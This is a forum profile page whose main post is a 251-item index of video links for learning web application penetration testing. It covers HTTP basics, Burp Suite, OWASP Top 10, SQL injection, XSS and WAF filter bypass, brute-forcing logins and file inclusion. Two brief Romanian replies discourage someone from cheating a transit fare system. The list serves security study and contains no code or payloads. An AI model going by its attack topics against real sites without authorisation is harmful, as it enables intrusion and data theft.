Jump to content

Nytro

Administrators
  • Posts

    18664
  • Joined

  • Last visited

  • Days Won

    683

Everything posted by Nytro

  1. Web Application Penetration Testing Phase 1 – History 1. History of Internet - https://www.youtube.com/watch?v=9hIQjrMHTv4 Phase 2 – Web and Server Technology 2. Basic concepts of web applications, how they work and the HTTP protocol - https://www.youtube.com/watch?v=RsQ1tFLwldY&t=7s 3. HTML basics part 1 - https://www.youtube.com/watch?v=p6fRBGI_BY0 4. HTML basics part 2 - https://www.youtube.com/watch?v=Zs6lzuBVK2w 5. Difference between static and dynamic website - https://www.youtube.com/watch?v=hlg6q6OFoxQ 6. HTTP protocol Understanding - https://www.youtube.com/watch?v=JFZMyhRTVt0 7. Parts of HTTP Request -https://www.youtube.com/watch?v=pHFWGN-upGM 8. Parts of HTTP Response - https://www.youtube.com/watch?v=c9sMNc2PrMU 9. Various HTTP Methods - https://www.youtube.com/watch?v=PO7D20HsFsY 10. Understanding URLS - https://www.youtube.com/watch?v=5Jr-_Za5yQM 11. Intro to REST - https://www.youtube.com/watch?v=YCcAE2SCQ6k 12. HTTP Request & Response Headers - https://www.youtube.com/watch?v=vAuZwirKjWs 13. What is a cookie - https://www.youtube.com/watch?v=I01XMRo2ESg 14. HTTP Status codes - https://www.youtube.com/watch?v=VLH3FMQ5BIQ 15. HTTP Proxy - https://www.youtube.com/watch?v=qU0PVSJCKcs 16. Authentication with HTTP - https://www.youtube.com/watch?v=GxiFXUFKo1M 17. HTTP basic and digest authentication - https://www.youtube.com/watch?v=GOnhCbDhMzk 18. What is “Server-Side” - https://www.youtube.com/watch?v=JnCLmLO9LhA 19. Server and client side with example - https://www.youtube.com/watch?v=DcBB2Fp8WNI 20. What is a session - https://www.youtube.com/watch?v=WV4DJ6b0jhg&t=202s 21. Introduction to UTF-8 and Unicode - https://www.youtube.com/watch?v=sqPTR_v4qFA 22. URL encoding - https://www.youtube.com/watch?v=Z3udiqgW1VA 23. HTML encoding - https://www.youtube.com/watch?v=IiAfCLWpgII&t=109s 24. Base64 encoding - https://www.youtube.com/watch?v=8qkxeZmKmOY 25. Hex encoding & ASCII - https://www.youtube.com/watch?v=WW2SaCMnHdU Phase 3 – Setting up the lab with BurpSuite and bWAPP MANISH AGRAWAL 26. Setup lab with bWAPP - https://www.youtube.com/watch?v=dwtUn3giwTk&index=1&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV 27. Set up Burp Suite - https://www.youtube.com/watch?v=hQsT4rSa_v0&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV&index=2 28. Configure Firefox and add certificate - https://www.youtube.com/watch?v=hfsdJ69GSV4&index=3&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV 29. Mapping and scoping website - https://www.youtube.com/watch?v=H-_iVteMDRo&index=4&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV 30. Spidering - https://www.youtube.com/watch?v=97uMUQGIe14&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV&index=5 31. Active and passive scanning - https://www.youtube.com/watch?v=1Mjom6AcFyU&index=6&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV 32. Scanner options and demo - https://www.youtube.com/watch?v=gANi4Kt7-ek&index=7&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV 33. Introduction to password security - https://www.youtube.com/watch?v=FwcUhcLO9iM&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV&index=8 34. Intruder - https://www.youtube.com/watch?v=wtMg9oEMTa8&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV&index=9 35. Intruder attack types - https://www.youtube.com/watch?v=N5ndYPwddkQ&index=10&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV 36. Payload settings - https://www.youtube.com/watch?v=5GpdlbtL-1Q&index=11&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV 37. Intruder settings - https://www.youtube.com/watch?v=B_Mu7jmOYnU&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV&index=12 ÆTHER SECURITY LAB 38. 
No.1 Penetration testing tool - https://www.youtube.com/watch?v=AVzC7ETqpDo&list=PLq9n8iqQJFDrwFe9AEDBlR1uSHEN7egQA&index=1 39. Environment Setup - https://www.youtube.com/watch?v=yqnUOdr0eVk&index=2&list=PLq9n8iqQJFDrwFe9AEDBlR1uSHEN7egQA 40. General concept - https://www.youtube.com/watch?v=udl4oqr_ylM&list=PLq9n8iqQJFDrwFe9AEDBlR1uSHEN7egQA&index=3 41. Proxy module - https://www.youtube.com/watch?v=PDTwYFkjQBE&list=PLq9n8iqQJFDrwFe9AEDBlR1uSHEN7egQA&index=4 42. Repeater module - https://www.youtube.com/watch?v=9Zh_7s5csCc&list=PLq9n8iqQJFDrwFe9AEDBlR1uSHEN7egQA&index=5 43. Target and spider module - https://www.youtube.com/watch?v=dCKPZUSOlr8&list=PLq9n8iqQJFDrwFe9AEDBlR1uSHEN7egQA&index=6 44. Sequencer and scanner module - https://www.youtube.com/watch?v=G-v581pXerE&list=PLq9n8iqQJFDrwFe9AEDBlR1uSHEN7egQA&index=7 Phase 4 – Mapping the application and attack surface 45. Spidering - https://www.youtube.com/watch?v=97uMUQGIe14&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV&index=5 46. Mapping application using robots.txt - https://www.youtube.com/watch?v=akuzgZ75zrk 47. Discover hidden contents using dirbuster - https://www.youtube.com/watch?v=--nu9Jq07gA 48. Dirbuster in detail - https://www.youtube.com/watch?v=2tOQC68hAcQ 49. Discover hidden directories and files with intruder - https://www.youtube.com/watch?v=4Fz9mJeMNkI 50. Directory bruteforcing 1 - https://www.youtube.com/watch?v=ch2onB_LFoI 51. Directory bruteforcing 2 - https://www.youtube.com/watch?v=ASMW_oLbyIg 52. Identify application entry points - https://www.youtube.com/watch?v=IgJWPZ2OKO8&t=34s 53. Identify application entry points - https://www.owasp.org/index.php/Identify_application_entry_points_(OTG-INFO-006) 54. Identify client and server technology - https://www.youtube.com/watch?v=B8jN_iWjtyM 55. Identify server technology using banner grabbing (telnet) - https://www.youtube.com/watch?v=O67M-U2UOAg 56. Identify server technology using httprecon - https://www.youtube.com/watch?v=xBBHtS-dwsM 57. Pentesting with Google dorks Introduction - https://www.youtube.com/watch?v=NmdrKFwAw9U 58. Fingerprinting web server - https://www.youtube.com/watch?v=tw2VdG0t5kc&list=PLxLRoXCDIalcRS5Nb1I_HM_OzS10E6lqp&index=10 59. Use Nmap for fingerprinting web server - https://www.youtube.com/watch?v=VQV-y_-AN80 60. Review webs servers metafiles for information leakage - https://www.youtube.com/watch?v=sds3Zotf_ZY 61. Enumerate applications on web server - https://www.youtube.com/watch?v=lfhvvTLN60E 62. Identify application entry points - https://www.youtube.com/watch?v=97uMUQGIe14&list=PLDeogY2Qr-tGR2NL2X1AR5Zz9t1iaWwlM 63. Map execution path through application - https://www.youtube.com/watch?v=0I0NPiyo9UI 64. Fingerprint web application frameworks - https://www.youtube.com/watch?v=ASzG0kBoE4c Phase 5 – Understanding and exploiting OWASP top 10 vulnerabilities 65. A closer look at all owasp top 10 vulnerabilities - https://www.youtube.com/watch?v=avFR_Af0KGk IBM 66. Injection - https://www.youtube.com/watch?v=02mLrFVzIYU&index=1&list=PLoyY7ZjHtUUVLs2fy-ctzZDSPpawuQ28d 67. Broken authentication and session management - https://www.youtube.com/watch?v=iX49fqZ8HGA&index=2&list=PLoyY7ZjHtUUVLs2fy-ctzZDSPpawuQ28d 68. Cross-site scripting - https://www.youtube.com/watch?v=x6I5fCupLLU&index=3&list=PLoyY7ZjHtUUVLs2fy-ctzZDSPpawuQ28d 69. Insecure direct object reference - https://www.youtube.com/watch?v=-iCyp9Qz3CI&list=PLoyY7ZjHtUUVLs2fy-ctzZDSPpawuQ28d&index=4 70. 
Security misconfiguration - https://www.youtube.com/watch?v=cIplXL8idyo&list=PLoyY7ZjHtUUVLs2fy-ctzZDSPpawuQ28d&index=5 71. Sensitive data exposure - https://www.youtube.com/watch?v=rYlzTQlF8Ws&index=6&list=PLoyY7ZjHtUUVLs2fy-ctzZDSPpawuQ28d 72. Missing functional level access controls - https://www.youtube.com/watch?v=VMv_gyCNGpk&list=PLoyY7ZjHtUUVLs2fy-ctzZDSPpawuQ28d&index=7 73. Cross-site request forgery - https://www.youtube.com/watch?v=_xSFm3KGxh0&list=PLoyY7ZjHtUUVLs2fy-ctzZDSPpawuQ28d&index=8 74. Using components with known vulnerabilities - https://www.youtube.com/watch?v=bhJmVBJ-F-4&index=9&list=PLoyY7ZjHtUUVLs2fy-ctzZDSPpawuQ28d 75. Unvalidated redirects and forwards - https://www.youtube.com/watch?v=L6bYKiLtSL8&index=10&list=PLoyY7ZjHtUUVLs2fy-ctzZDSPpawuQ28d F5 CENTRAL 76. Injection - https://www.youtube.com/watch?v=rWHvp7rUka8&index=1&list=PLyqga7AXMtPPuibxp1N0TdyDrKwP9H_jD 77. Broken authentication and session management - https://www.youtube.com/watch?v=mruO75ONWy8&index=2&list=PLyqga7AXMtPPuibxp1N0TdyDrKwP9H_jD 78. Insecure deserialisation - https://www.youtube.com/watch?v=nkTBwbnfesQ&index=8&list=PLyqga7AXMtPPuibxp1N0TdyDrKwP9H_jD 79. Sensitive data exposure - https://www.youtube.com/watch?v=2RKbacrkUBU&index=3&list=PLyqga7AXMtPPuibxp1N0TdyDrKwP9H_jD 80. Broken access control - https://www.youtube.com/watch?v=P38at6Tp8Ms&list=PLyqga7AXMtPPuibxp1N0TdyDrKwP9H_jD&index=5 81. Insufficient logging and monitoring - https://www.youtube.com/watch?v=IFF3tkUOF5E&index=10&list=PLyqga7AXMtPPuibxp1N0TdyDrKwP9H_jD 82. XML external entities - https://www.youtube.com/watch?v=g2ey7ry8_CQ&list=PLyqga7AXMtPPuibxp1N0TdyDrKwP9H_jD&index=4 83. Using components with known vulnerabilities - https://www.youtube.com/watch?v=IGsNYVDKRV0&index=9&list=PLyqga7AXMtPPuibxp1N0TdyDrKwP9H_jD 84. Cross-site scripting - https://www.youtube.com/watch?v=IuzU4y-UjLw&index=7&list=PLyqga7AXMtPPuibxp1N0TdyDrKwP9H_jD 85. Security misconfiguration - https://www.youtube.com/watch?v=JuGSUMtKTPU&index=6&list=PLyqga7AXMtPPuibxp1N0TdyDrKwP9H_jD LUKE BRINER 86. Injection explained - https://www.youtube.com/watch?v=1qMggPJpRXM&index=1&list=PLpNYlUeSK_rkrrBox-xvSkm5lgaDqKa0X 87. Broken authentication and session management - https://www.youtube.com/watch?v=fKnG15BL4AY&list=PLpNYlUeSK_rkrrBox-xvSkm5lgaDqKa0X&index=2 88. Cross-site scripting - https://www.youtube.com/watch?v=ksM-xXeDUNs&index=3&list=PLpNYlUeSK_rkrrBox-xvSkm5lgaDqKa0X 89. Insecure direct object reference - https://www.youtube.com/watch?v=ZodA76-CB10&list=PLpNYlUeSK_rkrrBox-xvSkm5lgaDqKa0X&index=4 90. Security misconfiguration - https://www.youtube.com/watch?v=DfFPHKPCofY&index=5&list=PLpNYlUeSK_rkrrBox-xvSkm5lgaDqKa0X 91. Sensitive data exposure - https://www.youtube.com/watch?v=Z7hafbGDVEE&list=PLpNYlUeSK_rkrrBox-xvSkm5lgaDqKa0X&index=6 92. Missing functional level access control - https://www.youtube.com/watch?v=RGN3w831Elo&list=PLpNYlUeSK_rkrrBox-xvSkm5lgaDqKa0X&index=7 93. Cross-site request forgery - https://www.youtube.com/watch?v=XRW_US5BCxk&list=PLpNYlUeSK_rkrrBox-xvSkm5lgaDqKa0X&index=8 94. Components with known vulnerabilities - https://www.youtube.com/watch?v=pbvDW9pJdng&list=PLpNYlUeSK_rkrrBox-xvSkm5lgaDqKa0X&index=9 95. Unvalidated redirects and forwards - https://www.youtube.com/watch?v=bHTglpgC5Qg&list=PLpNYlUeSK_rkrrBox-xvSkm5lgaDqKa0X&index=10 Phase 6 – Session management testing 96. Bypass authentication using cookie manipulation - https://www.youtube.com/watch?v=mEbmturLljU 97. 
Cookie Security Via httponly and secure Flag - OWASP - https://www.youtube.com/watch?v=3aKA4RkAg78 98. Penetration testing Cookies basic - https://www.youtube.com/watch?v=_P7KN8T1boc 99. Session fixation 1 - https://www.youtube.com/watch?v=ucmgeHKtxaI 100. Session fixation 2 - https://www.youtube.com/watch?v=0Tu1qxysWOk 101. Session fixation 3 - https://www.youtube.com/watch?v=jxwgpWvRUSo 102. Session fixation 4 - https://www.youtube.com/watch?v=eUbtW0Z0W1g 103. CSRF - Cross site request forgery 1 - https://www.youtube.com/watch?v=m0EHlfTgGUU 104. CSRF - Cross site request forgery 2 - https://www.youtube.com/watch?v=H3iu0_ltcv4 105. CSRF - Cross site request forgery 3 - https://www.youtube.com/watch?v=1NO4I28J-0s 106. CSRF - Cross site request forgery 4 - https://www.youtube.com/watch?v=XdEJEUJ0Fr8 107. CSRF - Cross site request forgery 5 - https://www.youtube.com/watch?v=TwG0Rd0hr18 108. Session puzzling 1 - https://www.youtube.com/watch?v=YEOvmhTb8xA 109. Admin bypass using session hijacking - https://www.youtube.com/watch?v=1wp1o-1TfAc Phase 7 – Bypassing client-side controls 110. What is hidden forms in HTML - https://www.youtube.com/watch?v=orUoGsgaYAE 111. Bypassing hidden form fields using tamper data - https://www.youtube.com/watch?v=NXkGX2sPw7I 112. Bypassing hidden form fields using Burp Suite (Purchase application) - https://www.youtube.com/watch?v=xahvJyUFTfM 113. Changing price on eCommerce website using parameter tampering - https://www.youtube.com/watch?v=A-ccNpP06Zg 114. Understanding cookie in detail - https://www.youtube.com/watch?v=_P7KN8T1boc&list=PLWPirh4EWFpESKWJmrgQwmsnTrL_K93Wi&index=18 115. Cookie tampering with tamper data- https://www.youtube.com/watch?v=NgKXm0lBecc 116. Cookie tamper part 2 - https://www.youtube.com/watch?v=dTCt_I2DWgo 117. Understanding referer header in depth using Cisco product - https://www.youtube.com/watch?v=GkQnBa3C7WI&t=35s 118. Introduction to ASP.NET viewstate - https://www.youtube.com/watch?v=L3p6Uw6SSXs 119. ASP.NET viewstate in depth - https://www.youtube.com/watch?v=Fn_08JLsrmY 120. Analyse sensitive data in ASP.NET viewstate - https://msdn.microsoft.com/en-us/library/ms972427.aspx?f=255&MSPPError=-2147217396 121. Cross-origin-resource-sharing explanation with example - https://www.youtube.com/watch?v=Ka8vG5miErk 122. CORS demo 1 - https://www.youtube.com/watch?v=wR8pjTWaEbs 123. CORS demo 2 - https://www.youtube.com/watch?v=lg31RYYG-T4 124. Security headers - https://www.youtube.com/watch?v=TNlcoYLIGFk 125. Security headers 2 - https://www.youtube.com/watch?v=ZZUvmVkkKu4 Phase 8 – Attacking authentication/login 126. Attacking login panel with bad password - Guess username password for the website and try different combinations 127. Brute-force login panel - https://www.youtube.com/watch?v=25cazx5D_vw 128. Username enumeration - https://www.youtube.com/watch?v=WCO7LnSlskE 129. Username enumeration with bruteforce password attack - https://www.youtube.com/watch?v=zf3-pYJU1c4 130. Authentication over insecure HTTP protocol - https://www.youtube.com/watch?v=ueSG7TUqoxk 131. Authentication over insecure HTTP protocol - https://www.youtube.com/watch?v=_WQe36pZ3mA 132. Forgot password vulnerability - case 1 - https://www.youtube.com/watch?v=FEUidWWnZwU 133. Forgot password vulnerability - case 2 - https://www.youtube.com/watch?v=j7-8YyYdWL4 134. Login page autocomplete feature enabled - https://www.youtube.com/watch?v=XNjUfwDmHGc&t=33s 135. 
Testing for weak password policy - https://www.owasp.org/index.php/Testing_for_Weak_password_policy_(OTG-AUTHN-007) 136. Insecure distribution of credentials - When you register in any website or you request for a password reset using forgot password feature, if the website sends your username and password over the email in cleartext without sending the password reset link, then it is a vulnerability. 137. Test for credentials transportation using SSL/TLS certificate - https://www.youtube.com/watch?v=21_IYz4npRs 138. Basics of MySQL - https://www.youtube.com/watch?v=yPu6qV5byu4 139. Testing browser cache - https://www.youtube.com/watch?v=2T_Xz3Humdc 140. Bypassing login panel -case 1 - https://www.youtube.com/watch?v=TSqXkkOt6oM 141. Bypass login panel - case 2 - https://www.youtube.com/watch?v=J6v_W-LFK1c Phase 9 - Attacking access controls (IDOR, Priv esc, hidden files and directories) Completely unprotected functionalities 142. Finding admin panel - https://www.youtube.com/watch?v=r1k2lgvK3s0 143. Finding admin panel and hidden files and directories - https://www.youtube.com/watch?v=Z0VAPbATy1A 144. Finding hidden webpages with dirbusater - https://www.youtube.com/watch?v=--nu9Jq07gA&t=5s Insecure direct object reference 145. IDOR case 1 - https://www.youtube.com/watch?v=gci4R9Vkulc 146. IDOR case 2 - https://www.youtube.com/watch?v=4DTULwuLFS0 147. IDOR case 3 (zomato) - https://www.youtube.com/watch?v=tCJBLG5Mayo Privilege escalation 148. What is privilege escalation - https://www.youtube.com/watch?v=80RzLSrczmc 149. Privilege escalation - Hackme bank - case 1 - https://www.youtube.com/watch?v=g3lv__87cWM 150. Privilege escalation - case 2 - https://www.youtube.com/watch?v=-i4O_hjc87Y Phase 10 – Attacking Input validations (All injections, XSS and mics) HTTP verb tampering 151. Introduction HTTP verb tampering - https://www.youtube.com/watch?v=Wl0PrIeAnhs 152. HTTP verb tampering demo - https://www.youtube.com/watch?v=bZlkuiUkQzE HTTP parameter pollution 153. Introduction HTTP parameter pollution - https://www.youtube.com/watch?v=Tosp-JyWVS4 154. HTTP parameter pollution demo 1 - https://www.youtube.com/watch?v=QVZBl8yxVX0&t=11s 155. HTTP parameter pollution demo 2 - https://www.youtube.com/watch?v=YRjxdw5BAM0 156. HTTP parameter pollution demo 3 - https://www.youtube.com/watch?v=kIVefiDrWUw XSS - Cross site scripting 157. Introduction to XSS - https://www.youtube.com/watch?v=gkMl1suyj3M 158. What is XSS - https://www.youtube.com/watch?v=cbmBDiR6WaY 159. Reflected XSS demo - https://www.youtube.com/watch?v=r79ozjCL7DA 160. XSS attack method using burpsuite - https://www.youtube.com/watch?v=OLKBZNw3OjQ 161. XSS filter bypass with Xenotix - https://www.youtube.com/watch?v=loZSdedJnqc 162. Reflected XSS filter bypass 1 - https://www.youtube.com/watch?v=m5rlLgGrOVA 163. Reflected XSS filter bypass 2 - https://www.youtube.com/watch?v=LDiXveqQ0gg 164. Reflected XSS filter bypass 3 - https://www.youtube.com/watch?v=hb_qENFUdOk 165. Reflected XSS filter bypass 4 - https://www.youtube.com/watch?v=Fg1qqkedGUk 166. Reflected XSS filter bypass 5 - https://www.youtube.com/watch?v=NImym71f3Bc 167. Reflected XSS filter bypass 6 - https://www.youtube.com/watch?v=9eGzAym2a5Q 168. Reflected XSS filter bypass 7 - https://www.youtube.com/watch?v=ObfEI84_MtM 169. Reflected XSS filter bypass 8 - https://www.youtube.com/watch?v=2c9xMe3VZ9Q 170. Reflected XSS filter bypass 9 - https://www.youtube.com/watch?v=-48zknvo7LM 171. Introduction to Stored XSS - https://www.youtube.com/watch?v=SHmQ3sQFeLE 172. 
Stored XSS 1 - https://www.youtube.com/watch?v=oHIl_pCahsQ 173. Stored XSS 2 - https://www.youtube.com/watch?v=dBTuWzX8hd0 174. Stored XSS 3 - https://www.youtube.com/watch?v=PFG0lkMeYDc 175. Stored XSS 4 - https://www.youtube.com/watch?v=YPUBFklUWLc 176. Stored XSS 5 - https://www.youtube.com/watch?v=x9Zx44EV-Og SQL injection 177. Part 1 - Install SQLi lab - https://www.youtube.com/watch?v=NJ9AA1_t1Ic&index=23&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro 178. Part 2 - SQL lab series - https://www.youtube.com/watch?v=TA2h_kUqfhU&index=22&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro 179. Part 3 - SQL lab series - https://www.youtube.com/watch?v=N0zAChmZIZU&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro&index=21 180. Part 4 - SQL lab series - https://www.youtube.com/watch?v=6pVxm5mWBVU&index=20&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro 181. Part 5 - SQL lab series - https://www.youtube.com/watch?v=0tyerVP9R98&index=19&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro 182. Part 6 - Double query injection - https://www.youtube.com/watch?v=zaRlcPbfX4M&index=18&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro 183. Part 7 - Double query injection cont.. - https://www.youtube.com/watch?v=9utdAPxmvaI&index=17&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro 184. Part 8 - Blind injection boolean based - https://www.youtube.com/watch?v=u7Z7AIR6cMI&index=16&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro 185. Part 9 - Blind injection time based - https://www.youtube.com/watch?v=gzU1YBu_838&index=15&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro 186. Part 10 - Dumping DB using outfile - https://www.youtube.com/watch?v=ADW844OA6io&index=14&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro 187. Part 11 - Post parameter injection error based - https://www.youtube.com/watch?v=6sQ23tqiTXY&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro&index=13 188. Part 12 - POST parameter injection double query based - https://www.youtube.com/watch?v=tjFXWQY4LuA&index=12&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro 189. Part 13 - POST parameter injection blind boolean and time based - https://www.youtube.com/watch?v=411G-4nH5jE&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro&index=10 190. Part 14 - Post parameter injection in UPDATE query - https://www.youtube.com/watch?v=2FgLcPuU7Vw&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro&index=11 191. Part 15 - Injection in insert query - https://www.youtube.com/watch?v=ZJiPsWxXYZs&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro&index=9 192. Part 16 - Cookie based injection - https://www.youtube.com/watch?v=-A3vVqfP8pA&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro&index=8 193. Part 17 - Second order injection -https://www.youtube.com/watch?v=e9pbC5BxiAE&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro&index=7 194. Part 18 - Bypassing blacklist filters - 1 - https://www.youtube.com/watch?v=5P-knuYoDdw&index=6&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro 195. Part 19 - Bypassing blacklist filters - 2 - https://www.youtube.com/watch?v=45BjuQFt55Y&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro&index=5 196. Part 20 - Bypassing blacklist filters - 3 - https://www.youtube.com/watch?v=c-Pjb_zLpH0&index=4&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro 197. Part 21 - Bypassing WAF - https://www.youtube.com/watch?v=uRDuCXFpHXc&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro&index=2 198. Part 22 - Bypassing WAF - Impedance mismatch - https://www.youtube.com/watch?v=ygVUebdv_Ws&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro&index=3 199. Part 23 - Bypassing addslashes - charset mismatch - https://www.youtube.com/watch?v=du-jkS6-sbo&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro&index=1 NoSQL injection 200. 
Introduction to NoSQL injection - https://www.youtube.com/watch?v=h0h37-Dwd_A 201. Introduction to SQL vs NoSQL - Difference between MySQL and MongoDB with tutorial - https://www.youtube.com/watch?v=QwevGzVu_zk 202. Abusing NoSQL databases - https://www.youtube.com/watch?v=lcO1BTNh8r8 203. Making cry - attacking NoSQL for pentesters - https://www.youtube.com/watch?v=NgsesuLpyOg Xpath and XML injection 204. Introduction to Xpath injection - https://www.youtube.com/watch?v=2_UyM6Ea0Yk&t=3102s 205. Introduction to XML injection - https://www.youtube.com/watch?v=9ZokuRHo-eY 206. Practical 1 - bWAPP - https://www.youtube.com/watch?v=6tV8EuaHI9M 207. Practical 2 - Mutillidae - https://www.youtube.com/watch?v=fV0qsqcScI4 208. Practical 3 - webgoat - https://www.youtube.com/watch?v=5ZDSPVp1TpM 209. Hack admin panel using Xpath injection - https://www.youtube.com/watch?v=vvlyYlXuVxI 210. XXE demo - https://www.youtube.com/watch?v=3B8QhyrEXlU 211. XXE demo 2 - https://www.youtube.com/watch?v=UQjxvEwyUUw 212. XXE demo 3 - https://www.youtube.com/watch?v=JI0daBHq6fA LDAP injection 213. Introduction and practical 1 - https://www.youtube.com/watch?v=-TXFlg7S9ks 214. Practical 2 - https://www.youtube.com/watch?v=wtahzm_R8e4 OS command injection 215. OS command injection in bWAPP - https://www.youtube.com/watch?v=qLIkGJrMY9k 216. bWAAP- OS command injection with Commiux (All levels) - https://www.youtube.com/watch?v=5-1QLbVa8YE Local file inclusion 217. Detailed introduction - https://www.youtube.com/watch?v=kcojXEwolIs 218. LFI demo 1 - https://www.youtube.com/watch?v=54hSHpVoz7A 219. LFI demo 2 - https://www.youtube.com/watch?v=qPq9hIVtitI Remote file inclusion 220. Detailed introduction - https://www.youtube.com/watch?v=MZjORTEwpaw 221. RFI demo 1 - https://www.youtube.com/watch?v=gWt9A6eOkq0 222. RFI introduction and demo 2 - https://www.youtube.com/watch?v=htTEfokaKsM HTTP splitting/smuggling 223. Detailed introduction - https://www.youtube.com/watch?v=bVaZWHrfiPw 224. Demo 1 - https://www.youtube.com/watch?v=mOf4H1aLiiE Phase 11 – Generating and testing error codes 225. Generating normal error codes by visiting files that may not exist on the server - for example visit chintan.php or chintan.aspx file on any website and it may redirect you to 404.php or 404.aspx or their customer error page. Check if an error page is generated by default web server or application framework or a custom page is displayed which does not display any sensitive information. 226. Use BurpSuite fuzzing techniques to generate stack trace error codes - https://www.youtube.com/watch?v=LDF6OkcvBzM Phase 12 – Weak cryptography testing 227. SSL/TLS weak configuration explained - https://www.youtube.com/watch?v=Rp3iZUvXWlM 228. Testing weak SSL/TLS ciphers - https://www.youtube.com/watch?v=slbwCMHqCkc 229. Test SSL/TLS security with Qualys guard - https://www.youtube.com/watch?v=Na8KxqmETnw 230. Sensitive information sent via unencrypted channels - https://www.youtube.com/watch?v=21_IYz4npRs Phase 12 – Business logic vulnerability 231. What is a business logic flaw - https://www.youtube.com/watch?v=ICbvQzva6lE&list=PLWoDr1kTbIxKZe_JeTDIcD2I7Uy1pLIFI 232. The Difficulties Finding Business Logic Vulnerabilities with Traditional Security Tools - https://www.youtube.com/watch?v=JTMg0bhkUbo&list=PLWoDr1kTbIxKZe_JeTDIcD2I7Uy1pLIFI&index=2 233. How To Identify Business Logic Flaws - https://www.youtube.com/watch?v=FJcgfLM4SAY&list=PLWoDr1kTbIxKZe_JeTDIcD2I7Uy1pLIFI&index=3 234. 
Business Logic Flaws: Attacker Mindset - https://www.youtube.com/watch?v=Svxh9KSTL3Y&list=PLWoDr1kTbIxKZe_JeTDIcD2I7Uy1pLIFI&index=4 235. Business Logic Flaws: Dos Attack On Resource - https://www.youtube.com/watch?v=4S6HWzhmXQk&list=PLWoDr1kTbIxKZe_JeTDIcD2I7Uy1pLIFI&index=5 236. Business Logic Flaws: Abuse Cases: Information Disclosure - https://www.youtube.com/watch?v=HrHdUEUwMHk&list=PLWoDr1kTbIxKZe_JeTDIcD2I7Uy1pLIFI&index=6 237. Business Logic Flaws: Abuse Cases: iPod Repairman Dupes Apple - https://www.youtube.com/watch?v=8yB_ApVsdhA&list=PLWoDr1kTbIxKZe_JeTDIcD2I7Uy1pLIFI&index=7 238. Business Logic Flaws: Abuse Cases: Online Auction - https://www.youtube.com/watch?v=oa_UICCqfbY&list=PLWoDr1kTbIxKZe_JeTDIcD2I7Uy1pLIFI&index=8 239. Business Logic Flaws: How To Navigate Code Using ShiftLeft Ocular - https://www.youtube.com/watch?v=hz7IZu6H6oE&list=PLWoDr1kTbIxKZe_JeTDIcD2I7Uy1pLIFI&index=9 240. Business Logic Security Checks: Data Privacy Compliance - https://www.youtube.com/watch?v=qX2fyniKUIQ&list=PLWoDr1kTbIxKZe_JeTDIcD2I7Uy1pLIFI&index=10 241. Business Logic Security Checks: Encryption Compliance - https://www.youtube.com/watch?v=V8zphJbltDY&list=PLWoDr1kTbIxKZe_JeTDIcD2I7Uy1pLIFI&index=11 242. Business Logic Security: Enforcement Checks - https://www.youtube.com/watch?v=5e7qgY_L3UQ&list=PLWoDr1kTbIxKZe_JeTDIcD2I7Uy1pLIFI&index=12 243. Business Logic Exploits: SQL Injection - https://www.youtube.com/watch?v=hcIysfhA9AA&list=PLWoDr1kTbIxKZe_JeTDIcD2I7Uy1pLIFI&index=13 244. Business Logic Exploits: Security Misconfiguration - https://www.youtube.com/watch?v=ppLBtCQcYRk&list=PLWoDr1kTbIxKZe_JeTDIcD2I7Uy1pLIFI&index=15 245. Business Logic Exploits: Data Leakage - https://www.youtube.com/watch?v=qe0bEvguvbs&list=PLWoDr1kTbIxKZe_JeTDIcD2I7Uy1pLIFI&index=16 246. Demo 1 - https://www.youtube.com/watch?v=yV7O-QRyOao 247. Demo 2 - https://www.youtube.com/watch?v=mzjTG7pKmQI 248. Demo 3 - https://www.youtube.com/watch?v=A8V_58QZPMs 249. Demo 4 - https://www.youtube.com/watch?v=1pvrEKAFJyk 250. Demo 5 - https://hackerone.com/reports/145745 251. Demo 6 - https://hackerone.com/reports/430854 Sursa: https://drive.google.com/file/d/11TajgAcem-XI5H8Pu8Aa2GiUofyM0oQm/view
  2. Nu poti sa ii arati acele poze si gata? Totusi, orice ai face, probabil daca se prinde si anunta controlorii/politia e nasol ma gandesc.
  3. Salut, nu cred ca am inteles exact ce vrei sa faci de fapt. Din punctul meu de vedere, daca incerci sa pacalesti acel sistem de plati e foarte probabil sa ai probleme mai mari decat 240$ pe luna. Sunt destul de sigur ca exista un mecanism de validare a calatoriilor care poate fi dificil de pacalit. Chiar si la noi in RO e dificil de pacalit RATB/STB.
